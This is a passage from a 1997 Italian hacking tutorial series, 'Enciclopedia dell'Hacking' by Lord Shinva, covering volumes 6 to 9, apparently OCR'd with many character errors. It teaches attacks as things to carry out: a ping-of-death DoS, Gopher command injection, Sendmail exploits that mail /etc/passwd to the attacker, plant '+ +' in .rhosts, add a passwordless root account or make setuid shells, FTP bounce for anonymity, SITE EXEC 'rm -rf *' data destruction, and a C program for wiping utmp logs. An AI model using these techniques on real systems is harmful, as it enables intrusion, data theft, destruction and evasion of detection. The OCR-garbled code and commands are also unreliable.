programma... una soluzione migliore consiste nel programmare da se’ una 
utility che effettui molte connessioni alla stessa porta dello stesso server. 


Se il vostro client lo consente, potete nascondere il vostro IP Address 
effettuando un "bounce" (rimbalzo). In pratica si tratta di richiedere a 
un server di fare la stessa richiesta a un altro server, per far risultare 
come "richiedente" il suo IP Address anziche il nostro. 

Il comando e nel formato: finger @sito.com@altrosito.com 


Non preoccupatevi se non avete capito tutto: vi torneranno utili quando 
dovrete studiare un attacco e conoscerete meglio l'Arte. 


Nota su finger: alcuni siti (mi sembra di ricordare quello della Microsoft) 
disabilitano finger per evitare problemi... in alcuni casi pero si limitano 
a disabilitarlo, NON a cancellarlo dalla directory del server. 

Potrete quindi accedervi usando questo URL: 


http://www.sito.com/cgi-bin/finger 


e per passare 1 parametri aggiungete "?" e i vostri comandi con il metodo 
della codifica degli URL descritta nei volumi precedenti. 


Personalmente non ho provato la tecnica del ///*/S su server non-Unix (come 
Windows NT e 95) in quanto essa e basata sulla struttura di Unix. Comunque 
potrebbe essere interessante provare; da cosa nasce cosa... 


Passiamo ora a Ping. 


Combinato a Finger, Ping e° eccellente per effettuare un attacco D.O.S. in 
quanto e’ utilizzato praticamente ovunque, e non correte il rischio di non 
poterlo utilizzare come accade in alcuni casi con Finger. 


Per chi non lo conosce, diciamo che Ping e° un programma per controllare la 
presenza di un sito su Internet e valutare la sua velocita’ di collegamento. 


Il funzionamento e’ molto simile: aprire molte connessioni a un server, fino 
a che questo collassera’ per il troppo lavoro richiesto alla CPU. 

Se avete la possibilita’ di scegliere tra Ping e Ping-f vi consiglio di 
scegliere quest'ultimo, in quanto e° estremamente piu veloce. 


Linux e inoltre vulnerabile a un particolare attacco: da un computer che usi 
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Windows 95 o NT si puo usare questo comando: 
ping -1 65510 sito.com 


dove sito.com e° un sito che usa Linux (versioni fino alla 2.0.20 esclusa). 
La macchina si blocchera’ e si riavviera’ automaticamente. 
Potete sperimentare anche altri valori tra 65508 e 65527 in luogo di 65510. 


Le vecchie versioni di Gopher hanno un serio bug: creando un file .links su 
un server gopher pubblico, contenente queste linee di testo: 


Type=8 
Name=Sceglimi 
Host=;/bin/sh 
Port= 

Path= 


potete collegarvi a Gopher, entrare nella directory dove avete piazzato il 
file .links e scegliere la voce "Sceglimi". Il comando messo dopo "Host=;" 
verra’ eseguito (nel nostro caso, una shell com accesso root). 


Dal prossimo volume inizieremo con tecniche raffinate che vi consentiranno 
di fare cose impensabili. Siate certi di aver prima imparato quelle sin qui 
descritte, o non potrete apprendere quelle piu’ complesse. 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 


VAI AL VOLUME 7 
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GÌ Lord Shinva 
e) -DiGiTAL::ALLIANCE- 
C:0.N:F.E:D.E:R.A:T.i:0.N 
Enciclopedia dell' Hacking 
Volume 7 


TECNICHE AVANZATE: SENDMAIL 

Sarete felici di sapere che questo e° l'ultimo volume sulle tecniche 
fondamentali e gli exploit. Dal prossimo inizieremo con l'hacking vero e 
proprio, e metteremo in pratica (con grande dolore da parte dei SysAdmin) 
quello che faremo di volta in volta. Ovviamente mi aspettero° che ora che 
avete abbastanza informazioni di base abbiate chiari concetti come server e 
client, FakeMail, come fare piccole cose come trovare la versione di un 
server, ecc. Se qualcosa non dovesse essere chiaro, non esitate a scrivermi 
e ad esporre il problema. Cerchero° di rispondervi non appena avro’ trovato 
abbatanza tempo. NON chiedetemi qual'e’ la password di un sito xxx 0 dove 
trovare la versione pirata di un gioco. Siamo hackers, non pirati. 


Qualcuno mi ha chiesto perche’ sto scrivendo questa "enciclopedia". 

Beh, forse perche’ e quello che ho sempre cercato e non ho mai trovato 
quando volevo imparare l'hacking... e poi credo che sia molto piu” completa 
di quei piccoli files sulle basi dell'hacking scritti da hackers, per 

hackers. Ma quale sarebbe lo scopo? Se uno e’ gia° hacker, non ha bisogno 
di imparare le basi di quello che conosce gia’... okay, parentesi chiusa. 


Quello che partira” dal prossimo volume sara’ pertanto un vero e proprio 
corso di hacking a puntate (con tanto di supporto via email), dedicato a 
tutti coloro che mi hanno scritto e hanno creduto in questo progetto di 
divulgazione, siano essi hackers o wannabe (futuri hackers, speriamo). 


Iniziamo dunque questo ultimo volume sulle tecniche con una breve descrizione 
del servizio di posta elettronica di Unix. 


Il programma server che risponde a chi si collega alla porta SMTP (25) e 
chiamato Sendmail. Come abbiamo visto in un precedente volume, all'atto del 
collegamento via Telnet avremo una risposta di questo genere: 


220 server.com Sendmail 8.6/8.7 12/31/97 ready at Sun, 23 Oct 97 19:44:03 PDT 


(il numero di versione di un server lo troviamo anche sbirciando tra gli 
headers delle emails che riceviamo quotidianamente). 
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I numeri 8.6/8.7 dopo la parola "Sendmail" (oppure "Smail") rappresentano la 
versione del server SMTP. Mettiamo una volta per tutte in chiaro che SMTP e 
il nome del servizio (della porta 25) e Sendmail e’ il nome del programma che 
si occupa di gestire SMTP: in pratica Sendmail e il server SMTP di Unix. 


Dunque, perche. dovremmo voler conoscere il numero di versione di Sendmail? 


Sendmail e’ famoso tra gli hackers come il programma piu’ "bacato" esistente. 
Basti pensare che praticamente tutte le versioni di Sendmail in giro (anche 
quelle piu” nuove) hanno un qualche bug che un hacker puo sfruttare per 
guadagnare illecitamente accesso a un sistema. 


E il bello e il modo in cui lo si fa; non tramite una password o chissa” 
NOMI 


cosa, ma dalla parte piu’ "innocua" di un sistema informatico: la posta 
elettronica! 


Vogliamo vedere cosa si puo” fare con Sendmail? :) 


Iniziamo con le sottoversioni della 8.6 (piu° precisamente le 8.6.6 e 3.6.7). 
Vogliamo una shell root? Niente di piu facile: bastera” chiamare il 
programma Sendmail con il parametro -d seguito da un numero molto grande, 
come nel seguente esempio: 


Sendmail -d3344556677 


Se non avete un accesso diretto al server (e quindi state "lavorando" da 
remoto) avrete bisogno di una shell per "chiamare" Sendmail. 

Come ottenerla sara’ oggetto dei prossimi volumi, ma se andate di fretta 
potete sempre prendere un file passwd o shadow e crackarlo per avere accesso 
shell. L'ideale sarebbe un account di quale Universita”... 

Oppure potreste usare l'hack del PHF (o della Query, come ultima risorsa) per 
eseguire il comando senza bisogno di shell interattiva. 

Ancora una volta vi consiglio di aspettare di conoscere TUTTA la materia, 
prima di mettere in pratica... ancora non sapete come nascondervi in un 
sistema, quindi non abbiate fretta. Se proprio volete testare qualcosa, 
procuratevi Linux (se non l'avete gia), installatelo sul VOSTRO computer e 
provate. 


Per la cronaca, la sottoversione 8.6.9 non e’ vulnerabile a quest'attacco, ma 
anche qui si puo avere una shell root, utilizzando un exploit che si trova 
sui siti per hackers. Si tratta di un programmino in C (creato da Atreus). 
Non lo includo perche dalla versione 8.6.12 (compresa) in poi tale exploit 
non funziona. 
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NOTA: la maggior parte dei problemi di sicurezza vengono fatti notare e molto 
spesso anche risolti proprio dagli hackers. Se non ci fossero gli hackers 
saremmo rimasti a versioni... preistoriche, dove bastava scrivere WIZ per 
avere tutto un computer ai propri comandi. Un motivo in piu’ per smettere di 
prendersela con noi se si assume personale incapace di gestire seriamente un 
sistema informatico, sia esso in rete o meno. 


Ci sono molte altre versioni 8.x.x bacate, ma poiche si tratta di piccoli 
bug tutti diversi e consigliabile cercare quello che interessa sul sito 

di 81gm (http://www.81gm.org), che elenca tutti i bug e ne da un hack 
completo per ciascuno, o su LOpht (http://www.lOpht.com). 


Unix assegna un livello utente (UID, cioe0 User IDentifier) e un livello di 
gruppo (GID, cioe. Group IDentifier) a ciascun utente. 

Un UID pari a 0 e (quasi sempre) un utente root. 

Se ad esempio nel file passwd di un sito troviamo... 


root:7u89vCSK0oL:amministratore:0:0:/:/bin/sh 
il primo numero (0) e UID e il secondo (0) e GID. 


E° possibile sfruttare un bug di Sendmail per forzare il nostro UID a 0... e 
diventare root :) Supponiamo infatti di aver crackato la password di un 
utente qualsiasi, ma di non riuscire ad accedere a root... come fare? 
Utilizzando questo hack sul Sendmail. Bisognera' innanzitutto avere accesso 
a una shell; molti utenti hanno una shell, anche se limitata, ma servira 

allo scopo. Se proprio non riuscite a procurarvene una, collegatevi a una 
delle tantissime BBS via Telnet presenti su Internet. Esse sono quasi sempre 
ad accesso gratuito e usano sistemi Unix, con tanto di shell per gli utenti. 
Non sono shell root... ma sapremo accontentarci, dal momento che da una 
shell ad accesso limitato si puo’ arrivare a root. 

Alcuni siti, come quello di Lord Somer (http://www.ilf.net/LordSomer/), hanno 
intere liste di BBS Telnet. Dovete solo scegliere quella che preferite. 


Dicevamo, come forzare UID a 0 ora che abbiamo una shell? 
Digitando quanto segue: 


% cat -/.forward <-- noi 
<-- noi 
miosito.com miousername <-- nol 
ND <-- noi (premere Ctrl-D) 
% smail -bs -D +root/.rhosts -v20 <-- nol 
220 provider.com Sendmail x.x.x.x ready ecc... <-- server 
expn root <-- nol 
250 <root> <-- server 
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quit <-- noi 

% rsh -l root lamesite.com tesh\ -i <-- nol 
WARNING: no access to TTY (bad file number) <-- Server 
# id <-- noi 

UID=0 GID=0 <-- Server 


Nell'ultima riga, quando scriviamo il comando ID, il server risponde che il 
nostro UID e il nostro GID sono uguali a 0... il che significa... beh, lo 
avete capito =) 


I vecchi server Sendmail (versioni 5.xx) hanno dei bug estremamente gravi; 
basti pensare alla versione 5.64 che permette di sfruttare il programma 
"decode" (uudecode) di Unix per "eliminare" l'accesso tramite password. 

In pratica, inviando una FakeMail (con Telnet) di questo tipo: 


HELO hacker.com 
MAIL FROM: bin 
RCPT TO: decode 
DATA 

begin 644 /usr/bin/.rhosts 
$*R° K"@* 


end 
QUIT 


sara’ poi possibile utilizzare un client rlogin per collegarsi senza bisogno 

di password. Ma come e stato possibile? Quello che e° successo e° questo: 
il file .rhosts di Unix contiene una lista di hostname e username ai quali 

e’ consentito l'accesso. Mettendo un + al posto di hostname e username si 
consente l'accesso a chiunque, ed e’ esattamente questo cio° che abbiamo 
fatto: la linea dopo "begin 644..." non e’ altro che tale comando (+ +) 
codificato con il programma encode (uuencode). Inviando questa FakeMail a 
decode (uudecode) quel codice verra’ ritrasformato in "+ +" e scritto nel 
file /usr/bin/.rhosts (vedi sopra). 

Bastera® dunque procurarsi un client rlogin per accedere tranquillamente al 
Server... 


La versione 5.65 di Sendmail (la successiva a quella appena vista, creata 
per risolvere quel problema) e’ ancora piu’ pericolosa... ;) 
Infatti basta inviare via Telnet i seguenti comandi: 


HELO hackers.com 


MAIL FROM: [/usr/ucb/tail|/usr/bin/sh 
RCPT TO: prova 
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DATA 
From: pirata@hackers.com 
Return-Receipt-To: [nessuno 


#!/bin/sh 
COMANDI 


QUIT 
AI posto di "COMANDI" vanno inseriti uno o piu comandi shell (su righe 
separate), come ad esempio: 
/bin/mail pirata@hackers.com < /etc/passwd 
per inviare a voi stessi il file /etc/passwd (o qualsiasi altro), oppure: 


echo prova::0:0::/:/bin/sh >> /etc/passwd 


per aggiungere l'account "prova" (con accesso root, senza password, con shell 
root e accesso a tutto l'hard disk....) al file /etc/passwd (notate i due >> 
anziche. uno solo). O ancora: 


chmod 777 /etc/passwd 
per rendere 1l file /etc/passwd (o altro) prelevabile senza restrizioni, o: 


cp /bin/sh /tmp/pirata 
chmod 6777 /tmp/pirata 


dove nella prima riga copiamo (cp) la shell (/bin/sh) nella directory /tmp 
col nome di "pirata" (vi consiglio di cambiare questo nome :) 

Nella seconda riga diamo accesso al file /tmp/pirata a chiunque, anche a un 
utente qualunque. Tale file non e altro, come abbiamo visto, che la shell. 
Quindi bastera° andare in /tmp ogniqualvolta vi servira una shell root, e 
digitare "pirata" per invocare la shell ed eseguire un qualsiasi comando. 


Un altro hack famoso e’ quello dell'attacco del pipe, funzionante su versione 
5.56 (e altre). Funziona cosi: si prepara una semplice FakeMail del tipo... 


HELO hacker.com 

MAIL FROM:<"|/bin/mail pirata@hackers.com < /etc/passwd"> 
RCPT TO:<"pirata@hotmail.com"> 

DATA 

questa e’ una prova... 
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QUIT 


e, se il server e’ vulnerabile, riceveremo 1l file /etc/passwd via e-mail. 
Naturalmente si potra® usare qualsiasi comando dopo il pipe (il "|"). 


TECNICHE AVANZATE: FTP BOUNCE 

Passiamo ora a qualcosa di veramente interessante: FTP. Vi chiederete: ma 
FTP non serve solo a trasferire 1 file? 

La risposta e’ no. Beh, dovrebbe essere si... ma sapete com'e... un hacker 
e’ un po come un bambino curioso che si diverte di piu’ a "smontare" un 
giocattolo che a usarlo per quello a cui servirebbe =) 


Innanzitutto sappiate che FTP altro non e° che una sessione di Telnet con 
qualche piccolo extra in piu (il trasferimento di file). 


Esistono infatti dei comandi "interni", come abbiamo visto per SMTP, e quindi 
anche FTP e’ gestibile (in parte) tramite Telnet. 


La tecnica che ci accingiamo a studiare e° detta "FTP Bounce" (rimbalzo 
dell'FTP). 


Vi servira’ innanzitutto un server FTP che vi permetta di inviare e prelevare 
files da una directory qualsiasi. Potete tranquillamente trovare tali server 
cercando la parola "warez" (software commerciale piratato) con un motore di 
ricerca di files come "FTP Search" (http://ftpsearch.ntnu.no/ftpsearch), 
oppure "Filez" (http://www.filez.com); prendete nota anche della directory 
che verra’ visualizzata accanto al nome del server che la contiene. 


Ora provate a collegarvi a uno di quei server, ed a entrare nella directory 
"warez" (o un'altra in cui si possano leggere e scrivere 1 files). Provate 
a inviare un file di prova e a prelevarlo di nuovo, per controllare se e 
questo il server "giusto". Se tutto funziona, lo avete trovato, altrimenti 
usatene un altro (ce ne sono moltissimi). 


Questo server sara’ la vostra "base". In tutti gli attacchi che effettuerete 
verra’ visualizzato l'IP Address di questo server, anziche’ il vostro. 


Ora studiamo il funzionamento dell'attacco, in modo da poterlo adattare a 
qualsiasi nostro bisogno, per poter magari anche inventare nuovi metodi di 
utilizzo a seconda delle necessita’. 


Dovremo innanzitutto creare un file (vedremo tra poco come) che contenga i 
comandi che vogliamo far eseguire (in base a cio che vogliamo fare). 


file:///D|/FILE%20CONDIVISI/EBOOK-GUIDE-CORSI-M...a]%20Enciclopedia%20di%20Lord%20Shinva/VOL7.HTM (6 di 11)09/11/05 17.36.19 


vol7 


Non preoccupatevi ora del suo contenuto. Per ora ci interessa solo studiare 
il funzionamento della tecnica, e poi procedere con gli esempi. 


Ora ci servira” un normale programma client FTP (come Cute-FTP e WS-FTP se 
usate Windows, oppure il comando FTP di Linux). Lo useremo per inviare il 
file di cui sopra nel server "base" che abbiamo scelto prima. 


Una volta inviato il nostro file, chiuderemo FTP e passeremo a Telnet. 
La porta di FTP e la numero 21. Colleghiamoci dunque al server "base" alla 
porta 21 e aspettiamo una risposta. Ora potremo inserire i comandi: 


USER anonymous 
PASS nessuno @niente.com 


e, se l'accesso anonimo e abilitato (come succede nel 90% dei casi), il 
server rispondera’ qualcosa come "User anonymous logged in". Siamo dentro. 


Dobbiamo ora conoscere l'IP Address del server da attaccare. Percio” avremo 
bisogno di un programma DNS per risalire dall'host name all'IP Address. 


Ora digitiamo (in Telnet) il comando PORT x,x,x,x,0,y dove x,x,x,x © 
l'IP Address del server da attaccare e y e la porta del servizio da 
attaccare (21 per FTP, 80 per il Web, e così’ via). 

Notate che l'IP Address in questo caso non usa punti per separare i numeri 
ma delle virgole. 


Quello che succede inserendo il comando PORT e questo: diciamo al server 
FTP di collegarsi all'IP Address e alla porta che gli diamo come parametri. 

In pratica, sara’ il server FTP a collegarsi, anziche’ noi... abbiamo così” 

il server come "complice", in quanto sara’ lui a fare tutte le operazioni e 

le eventuali tracce lasciate saranno le sue! :) Noi siamo nell'ombra... 

(vi renderete conto che questo e° un ottimo mezzo per nascondere in un modo 
impensabile le proprie tracce, qualsiasi cosa vi serva fare). 


Bastera ora digitare RETR nomedelfileinviato e tutti i comandi desiderati 
saranno inviati dalla "base" alla "vittima". 


Ma ora basta teoria, passiamo a qualche esempio esplicativo. 


Vogliamo ad esempio inviare una FakeMail impossibile da rintracciare? 
Allora studiamo il problema in questi termini: 


1) quali tipi di comandi dovremo inserire nel file? 
2) quale servizio stiamo hackerando? 
3) quale server useremo come destinazione? 
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Ecco le risposte: 


1) i comandi saranno per SMTP, dovendo noi inviare una FakeMail 

2) il servizio e’, come abbiamo appena detto, la posta, cioe SMTP 

3) un qualsiasi server SMTP andra’ bene; usaremo DNS per conoscerne l'IP 
Address (che in questo esempio supponiamo essere 123.45.67.89) 


Ora ci colleghiamo, come abbiamo fatto prima, al server "base" (FTP) con 
il client FTP e inviamo i comandi (che avremo scritto prima di iniziare il 
collegamento) della FakeMail: HELO, MAIL FROM, ecc. (la solita FakeMail). 


Adesso useremo Telnet sul server "base" (la porta e© sempre 21, fin qui 
rimane sempre tutto uguale) e digitiamo PORT 123,45,67,89,0,25 dove 
123,45,67,89 e l'IP Address del server che dovra’ eseguire il nostro file 
(il server di posta), ma con le virgole anziche 1 punti (questo e il 
formato richiesto da FTP), mentre 25 e la porta SMTP. 


Infine scriveremo RETR nomedelfileinviato per avviare l'esecuzione dei 
comandi. Dopo poco tempo la FakeMail verra’ inviata dal server, ma senza 
un IP Address che riveli la nostra identita. 


NOTA IMPORTANTE: alla fine del file dei comandi bisogna aggiungere circa 60 
kilobyte di byte 0, affinche’ la connessione duri abbastanza e non si 

interrompa bruscamente. Per creare tale file basta usare "debug" (sotto DOS) 
scrivendo: 


DEBUG PROVA <-- noi 
File non trovato 

-f 100,F000,0 <-- noi 

-TCX <-- noi 

:0000 

EA60 <-- nol 

-W <-- nol 

Scrittura di EA60 bytes in corso... 

-q <-- noi 


Ora un file chiamato "PROVA" di dimensioni 60000 byte sara’ stato creato. 
Se il nostro file dei comandi l'abbiamo chiamato "comandi" (che fantasia...) 
scriveremo: 


copy /b comandi+prova finale 


E un nuovo file, "finale", verra’ creato. Questo sara’ il file da inviare. 
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ATTENZIONE: questo va fatto TUTTE le volte che useremo il metodo dell' FTP 
Bounce, non solo nel caso della FakeMail. 


Facciamo ora un altro esempio, un po piu’ complesso. 


A volte capita di trovare un server che non ci permette di prelevare un file 
perche° magari il provider da cui chiamiamo e? in Italia e il suddetto server 
invece si trova all'estero e non vuole dare accesso a chi proviene da *.it e 
cose del genere. Come fare, allora? 


Creeremo un file dei comandi contenente quanto segue: 


user anonymous 
pass nessuno @niente.com 

cewd /directory/dove/si/trova/il/file 
type i 

port X,X,X,X,Y,Y 

retr nome_del_file_da_prelevare 
quit 


(ovviamente anche questo file va "trattato" con debug e copy). 
Chiamiamo questo file con un nome come "bounce". 


Nel file sopra dovrete sostituire directory e nome file. X,X,X,X e il 
*vostro* IP Address, e Y,Y e’ spiegato piu’ giu. 


Ecco cosa bisogna fare: 


- Collegatevi con Telnet alla porta 21 del server "base" 

- Scrivete PASV (e invio, ovviamente) 

- Il server rispondera’ con qualcosa come 111.22.33.44,0,21 
Prendete nota degli ultimi due numeri (0 e 21) 

- Scrivete STOR hahaha 

- Ora Telnet si blocchera”, poiche’ sta aspettando i dati da inviare 

- Usate il vostro client FTP, collegatevi di nuovo al server e inviate il 
file (nel nostro esempio l'abbiamo chiamato bounce) 

- Ora aprite un altro client Telnet, collegatevi di nuovo al server "base" 
sulla porta 21 e scrivete PORT x,x,x,x,0,21 (dove x.x.x.x e’ l'IP Address 
del server da attaccare, cioe’ quello da cui volete prelevare 1 file) 

- Scrivete RETR bounce (se avete chiamato "bounce" il file dei comandi) 

- Dopo un certo tempo (che dipende dalle dimensioni del file da scaricare) 
troverete il file desiderato nel server "base", con il nome "hahaha". 


Esistono molti altri metodi per utilizzare l'FTP Bounce; ad esempio se volete 
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"bombardare" un utente su IRC, potete creare un file dei comandi contenente 
una serie di DCC CHAT, PRIVMSG, ecc. (solo se conoscete bene IRC) e farli 
mandare dal vostro server "base" a uno (o molti) server IRC. 


Potete inoltre usarlo per collegarvi a una shell (i comandi Telnet vanno 
messi nel file dei comandi) e leggere 1l file delle password e fare altre 

cose senza essere scoperti. Ad esempio potete usare "cat < /etc/shadow" per 
visualizzare un file delle password shadow, o un "rm -rf *" (molto utile per 
rendere la vita miserabile ai SysAdmin che si stancano di fare un backup 

di tutti i files dei loro sistemi)... 


Vale la pena di spendere ancora un paio di parole sui bugs di FTP. 


SITE EXEC e un comando che si trova in molti server, sia per Unix che per 
Windows. Non e° un bug, ma un comando che sembra essere stato fatto apposta 
per un hacker.malicious :) A cosa serve, vi chiederete... 


Utilizzando Telnet sulla porta 21 di un server FTP, inviate i comandi USER 

e PASS come visto sopra, in modo da accedere in modo "anonimo" al server, e 

poi digitate SITE EXEC seguito da un comando. Se SITE EXEC e° implementato, 
il vostro comando verra’ eseguito. 


Un modo per conoscere quali comandi sono implementati su un server FTP si 
puo usare il comando HELP. 


Un'attivita” che personalmente *adoro* praticare e© andare sui canali IRC per 
pedofili, aspettare che qualcuno faccia pubblicita’ all'indirizzo del proprio 
server FTP pieno di schifezze e fare un po di pulizia usando il comando: 


SITE EXEC rm -rf * 


...se il server e per Unix (come ftpd). Oppure usando format /autotest se 
il server e (praticamente sempre) per Windows (Serv-U, WarFTP). 


CONCLUSIONE PRIMA SEZIONE 

Se non avete compreso il funzionamento di una o piu’ tecniche (sperando che 
non siano troppe) non dovete preoccuparvi: col tempo le capirete, e molto 
probabilmente ne apporterete anche vostre personali varianti. 


Comunque, dovrete essere voi a decidere quale utilizzare, in quale occasione 
e se preferire una all'altra. Potreste preferire una tecnica (ad esempio il 
Bounce) a un exploit (SITE EXEC) o a un hack (Sendmail o PHF). 

Sta a voi scegliere. 
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Attenti a non cacciarvi nei guai. Se vi serve aiuto, potete rintracciarmi 
all'indirizzo Lord.Shinva@usa.net 


AI prossimo volume! 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 


VAI AL VOLUME 8 
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2 Lord Shinva 
-DiGiTAL::ALLIANCE- 
C:0.N:F.E:D.E:R.A:T.i1:0.N 
Enciclopedia dell' Hacking 
Volume 8 


HACKING PRATICO: PARTE 1 

Passiamo ora dalla teoria alla pratica: come vi ho gia’ detto nel precedente 
volume e bene che vi facciate un account su una delle tante BBS via Telnet 
che sono presenti su Internet, in modo da poter accedere via Telnet ai vari 
servizi senza doverci preoccupare di dover cancellare il nostro IP Address. 


Ovviamente per avere la certezza di non lasciar tracce dovremmo applicare 
delle misure di sicurezza addizionali, come cancellare 1 log di sistema e 
utilizzare un account di qualcun altro... ma in genere una shell di una BBS 
via Telnet puo bastare (a meno che non abbiate in mente di hackerare un 
mainframe del Pentagono o del NORAD). 


Prima di usare il vostro client Telnet preferito ricordate le tecniche di 

"bounce" di cui vi avevo parlato un po di tempo fa? 

Rivediamole brevemente: usando un programma come Telnet, Finger, FTP, ecc. 
e’ possibile effettuare un collegamento ricorsivo: in pratica, se il server 

sul quale abbiamo l'accesso shell e’ sito.com noi potremo collegarci ad esso 

e una volta dentro potremo usare Telnet, Finger, ecc. per collegarci ancora 

una, due, tre volte a sito.com. Cio° puo’ sembrare stupido: collegarsi a 

un sito, e da questo collegarsi di nuovo allo stesso sito! 


In realta” e un ottimo metodo per nascondere 1l nostro IP Address. Infatti, 
ogniqualvolta ci colleghiamo a un sito lasciamo l'IP Address del server sul 
quale siamo collegati. Normalmente, questo e l'IP Address del provider che 
stiamo usando, e da esso si puo risalire a noi. 

Ma se disponiamo di un account su una BBS via Telnet (come detto prima), non 
dovremo far altro che collegarci ad essa, e qualsiasi cosa faremo tramite la 
sua shell, anziche’ il nostro IP lasceremo quello della BBS. 

Ovviamente pero” la vittima degli attacchi potrebbe rivolgersi al SysAdmin 
della BBS e questi troverebbe il vostro IP Address nei suoi log. 
Ricapitolando: la vittima ha l'IP della BBS (perche e da li° che vi siete 
collegati), mentre la BBS ha il vostro IP. 


Se poi dalla BBS ci colleghiamo tramite Telnet alla BBS stessa, l'IP Address 
registrato non sara’ il nostro ma quello della BBS! Quindi ora il nostro IP 
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non compare piu’ da nessuna parte. Per essere ancora piu’ sicuri potremmo 
iterare la connessione una terza volta, oppure collegarci dalla BBS primaria 

a un'altra BBS su cui abbiamo un account (bounce)... insomma, basta usare la 
fantasia :) 


Ma ora occupiamoci dei log di sistema. Le nostre lezioni sull'hacking si 
baseranno principalmente su Unix (e quindi le varianti come Linux, ecc.) ma 
in futuro tratteremo anche altri sistemi come Windows NT e Macintosh. 


HACKING PRATICO: DISSIMULAZIONE 

I file di log piu’ "pericolosi" che contengono le tracce da cancellare sono 
letc/utmp e /etc/wtmp ma un SysAdmin (a meno che non sia improvvisamente 
impazzito) sa che proprio per evitare "manomissioni" tali file vanno protetti 

e quindi in genere non e possibile, per un utente qualsiasi, scrivere in 

essi. 


I "permessi" di lettura, scrittura e cancellazione di file e directory sotto 
Unix sono nella forma drwxrwxrwx (non spaventatevi! =) dove: 


"d" sta per directory (se c'e’ e° una directory, altrimenti e’ un file) 


r" sta per read (accesso in lettura consentito) 


n " 


w" sta per write (accesso in scrittura consentito) 


to! 


x" sta per execute (e° permesso eseguire il file) 


Quando una o piu’ di questi permessi non sono abilitati (non e° consentito 
fare una cosa, come nel caso di r w x oppure non si tratta di una directory 
nel caso di d) al loro posto troveremo un trattino (-). 

Escludiamo ora il primo carattere, che serve solo a capire se stiamo avendo 
a che fare con un file o una directory, e passiamo agli altri. Essi sono 
raggruppati in tre gruppi di tre caratteri ciascuno: il primo gruppo si 
riferisce a cosa puo” fare l'utente, il secondo a cosa puo fare il gruppo 

e il terzo a cosa possono fare gli altri. Un esempio: -rwxrw-r-- significa 
che l'utente puo leggere, scrivere ed eseguire il file (rwx), il secondo 

(rw-) significa che il gruppo (vedi spiegazione sui file delle password) puo 
leggere e scrivere, ma non eseguire il file, mentre l'ultimo (r--) significa 
che gli altri possono soltanto leggere il file, ma non modificarlo. 


Per visualizzare i permessi di un file useremo il comando LS di Unix. Esso 
equivale grossolanamente al comando DIR del DOS. 
L'uso di LS per visualizzare i permessi di file e directory e il seguente: 


ls -1nome_e_percorso_del_file 


file:///D|/FILE%20CONDIVISI/EBOOK-GUIDE-CORSI-M...a]%20Enciclopedia%20di%20Lord%20Shinva/VOL8.HTM (2 di 5)09/11/05 17.36.49 


vol8 


Quindi, nel caso di utmp faremo: ls -l /etc/utmp dalla nostra shell. 

Vediamo dunque dal risultato di questo comando se abbiamo il permesso di 
scrivere in quel file: se il terzo carattere (nella forma vista prima) e 

la lettera "w" (write) abbiamo tali permessi. Se invece e’ un trattino, 
dovremo accontentarci di nascondere il nostro IP Address... oppure hackerare 
root per avere tutti i permessi abilitati :) 


Se dunque abbiamo il permesso di scrittura, potremo nascondere le nostre 
tracce... o dissimulare il nostro username. Mi spiego meglio: supponiamo 

che il nostro username e "hacker". Il nostro scopo e’ farlo scomparire dai 
log, ma potremmo anche volerlo cambiare e far ricadere la colpa su qualcun 
altro che abbia un certo username, o ancora far comparire nei log un username 
inesistente (ad esempio qualche parolina per sfottere un po il SysAdmin enl 
caso in cui vada a leggersi il log per risalire a noi). 


Ecco il programma in C (per Unix) che fara’ entrambe le cose, a seconda di 
quella che ci serve: 


#include <stdio.h> 
#include <fcntl.h> 
#include <sys/types.h> 
#include <utmp.h> 
#include <sys/stat.h> 


struct utmp *user; 
char *usrt; 


main (argc,argv) 
int arge; 
char *argv[]; 
{ 
int fatto=0, cnt=0, start=1, index=0; 
char err[80]; 
if (argc == 1) printf("Removing you from utmp\n"); 
if (arge == 2) printf("Changing your login to %s\n",argv[1]); 
utmpname("/etc/utmp"); 
usrt = strrchr(ttyname(0),'/'); 
strepy(usrt,++usrt); 
while (fatto != 1) { 
user = getutent(); 
cnt++; 
if (stremp(user->ut_line,usrt) == 0) fatto=1; 
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} 


utmpname("/etc/utmp"); 
for (start=0; start<cnt; start++) { 
user = getutent(); 
} 
if (arge == 1) { 
user->ut_type = LOGIN_PROCESS; 
strepy(user->ut_name,"LOGIN"); 
} 
else user->ut_type = USER_PROCESS; 
if (arge == 2) strepy(user->ut_name,argv[1]); 
pututline(user); 
endutent(); 


Ovviamente dovrete avere almeno un po di dimestichezza con Unix... vi 
bastera’ salvare questo listato sotto forma di file di testo, e inviarlo in 

una directory del server da hackerare, dopodiche° dovrete compilare il file 
usando gcc oppure cc (i due compilatori C piu usati sotto Unix), digitando 
nella shell: gcc nome_del_file.c 


Se tutto e’ andato bene, troverete nella directory un file compilato (se il 
nome del file era nascondi.c il nome del file eseguibile sara” semplicemente 
"nascondi"). L'uso e° semplice: eseguendo il file le vostre tracce saranno 
cancellate da utmp. Scrivendo invece (ad esempio): nascondi hahaha 

il vostro username non sara’ cancellato da utmp, ma verra’ sostituito con 
"hahaha". 


Se avete il permesso in scrittura su utmp e non volete cimentarvi con il C 
e 1 compilatori (dovrete farlo prima o poi, se volete imparare seriamente) 
e volete ancora eliminare il vostro username dal log, dovrete: 


1) usare la tecnica del collegamento ricorsivo con Telnet (vista all'inizio 
di questo file) per nascondere l'IP; 
2) modificare il file utmp per rimuovere l'username... o eliminarlo. 


Comunque vi consiglio caldamente di evitare questa "manovra" estrema e di 
usare il programma in C sopra riportato. 


Nel prossimo volume impareremo a destreggiarci in un sistema, e a rimanerci. 
Vedremo come funziona una "backdoor" e come mantenere accesso root nel tempo. 
Nel frattempo, se avete installato Unix o Linux sul vostro computer (non 
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l'avete fatto ancora?? che aspettate? la miglior teoria e’ la pratica ;) 

sarebbe bene prendere dimestichezza con il compilatore C e con i comandi di 
base (come cat e ls), e dare poi uno sguardo ai file utmp e wtmp per vedere 
come sono strutturati. Provate anche a compilare e usare il programma in C 
presente in questo file. 


Buon lavoro! 


Copyright (C) 1997 by 
:: LORD SHINVA :: 


-Digital Alliance Confederation- 


VAI AL VOLUME 9 
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GÌ Lord Shinva 
e) -DiGITAL::ALLIANCE- 


C:0.N:F.E:D.E:R.A:T.i:0.N 
Enciclopedia dell' Hacking 
Volume 9 


HACKING PRATICO: PARTE 2 

Ora sappiamo come nascondere le nostre tracce, e come ottenere accesso root 
